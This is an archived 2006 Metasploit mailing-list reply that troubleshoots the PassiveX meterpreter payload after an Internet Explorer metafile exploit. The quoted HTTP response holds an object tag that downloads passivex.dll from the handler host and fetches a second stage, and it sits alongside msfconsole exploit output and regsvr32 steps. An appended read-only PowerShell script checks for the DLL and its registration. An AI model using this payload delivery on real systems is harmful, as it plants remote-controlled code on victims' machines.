Metasploit mailing list archives

Using the PassiveX payload


From: mmiller at hick.org (mmiller at hick.org)
Date: Fri, 5 May 2006 10:00:27 -0500

On Fri, May 05, 2006 at 11:11:43AM +0200, Feature Meister wrote:
Hi,

it seems as if the control does not get registered. At least there's
nothing like a "PassiveX.PassiveX" or "CPassiveX" registered under
HKEY_CLASSES_ROOT.
The account I am trying it with has administrative privileges.

<snip>

3rd response:
HTTP/1.1 200 OK
Connection: close
Content-type: text/html

<html><object classid="CLSID:B3AC7307-FEAE-4e43-B2D6-161E68ABA838"
codebase="http://192.168.71.75:8000/passivex.dll#-1,-1,-1,-1"><param
name="HttpHost" value="192.168.71.75"><param name="HttpPort"
value="8000"><param name="DownloadSecondStage"
value="1"></object></html>
============================================================
4th request (C -> 192.168.71.75:8000):
GET /passivex.dll HTTP/1.1

<snip>

on MSFConsole I see:

msf ie_xp_pfv_metafile(win32_passivex_meterpreter) > exploit
[*] Starting PassiveX Handler on 192.168.71.75:8000.
[*] Waiting for connections to http://192.168.71.75:80/
[*] HTTP Client connected from 192.168.71.71:1078, redirecting...
[*] HTTP Client connected from 192.168.71.71:1079, sending 1452 bytes
of payload...
[*] Sending PassiveX main page to client...
[*] Sending PassiveX DLL in HTTP response (106496 bytes)...

This looks like the correct series of events to me.  The next thing to
check is whether or not the passivex.dll is in the downloaded program
files folder (%WINDIR%\Downloaded Program Files).  You'll need to browse
there from a cmd, not from explorer.  If it's there, try to run the
following command:

"regsvr32 passivex.dll"

If the command succeeds, check in the registry again under
HKEY_CLASSES_ROOT for the class name.  If it doesn't, note the error and
send it back over to us.  As far as I know, PassiveX has no
non-standard DLL dependencies, so it should register without issue.  If
the file is not there (be sure to check in CONFLICT.x folders too just
in case), then something is going on that is causing it not to download
properly.  
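
The checks described in the reply above, collected into one read-only PowerShell script. This is an added example, not part of the original message and not Metasploit code. It assumes PowerShell 3 or later; the Wow6432Node lookup is an addition for 64-bit hosts, and the CLSID, file name and class names are the ones quoted in the thread.

```powershell
# Added example: read-only triage for the PassiveX artifacts discussed in this thread.
$clsid   = '{B3AC7307-FEAE-4e43-B2D6-161E68ABA838}'   # classid from the quoted HTTP response
$dllName = 'passivex.dll'                              # file named in the codebase URL
$progIds = 'PassiveX.PassiveX', 'CPassiveX'            # names the original poster searched for
$dpf     = Join-Path $env:WINDIR 'Downloaded Program Files'

# Step 1: look for the DLL on disk. -Recurse covers the CONFLICT.x subfolders and
# -Force includes hidden and system entries, giving the raw listing the reply asks for.
$files = @()
if (Test-Path -LiteralPath $dpf) {
    $files = @(Get-ChildItem -LiteralPath $dpf -Filter $dllName -Recurse -Force -ErrorAction SilentlyContinue)
}

# Step 2: look for the COM registration. The Wow6432Node path is an assumption added
# here for 64-bit hosts, where a 32-bit control registers under the redirected key.
$roots = 'Registry::HKEY_CLASSES_ROOT\CLSID', 'Registry::HKEY_CLASSES_ROOT\Wow6432Node\CLSID'
$registered = @(foreach ($root in $roots) {
    $key = "$root\$clsid\InprocServer32"
    if (Test-Path -LiteralPath $key) {
        # The unnamed (default) value of InprocServer32 is the path of the registered DLL.
        [pscustomobject]@{ Key = $key; Dll = (Get-Item -LiteralPath $key).GetValue('') }
    }
})
$progIdHits = @($progIds | Where-Object { Test-Path -LiteralPath "Registry::HKEY_CLASSES_ROOT\$_" })

# Step 3: map the findings onto the cases the reply distinguishes.
$status = if ($files.Count -eq 0 -and $registered.Count -eq 0) {
    'DLL not found: the download did not complete'
} elseif ($registered.Count -eq 0) {
    'DLL on disk but CLSID not registered: registration failed'
} else {
    'Control is registered'
}

[pscustomobject]@{
    Status     = $status
    DllOnDisk  = $files | ForEach-Object { $_.FullName }
    Registered = $registered
    ProgIds    = $progIdHits
} | Format-List
```

The same three lookups are useful when examining a host after the fact, since a registered InprocServer32 entry for this CLSID shows which copy of the DLL the browser would load.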


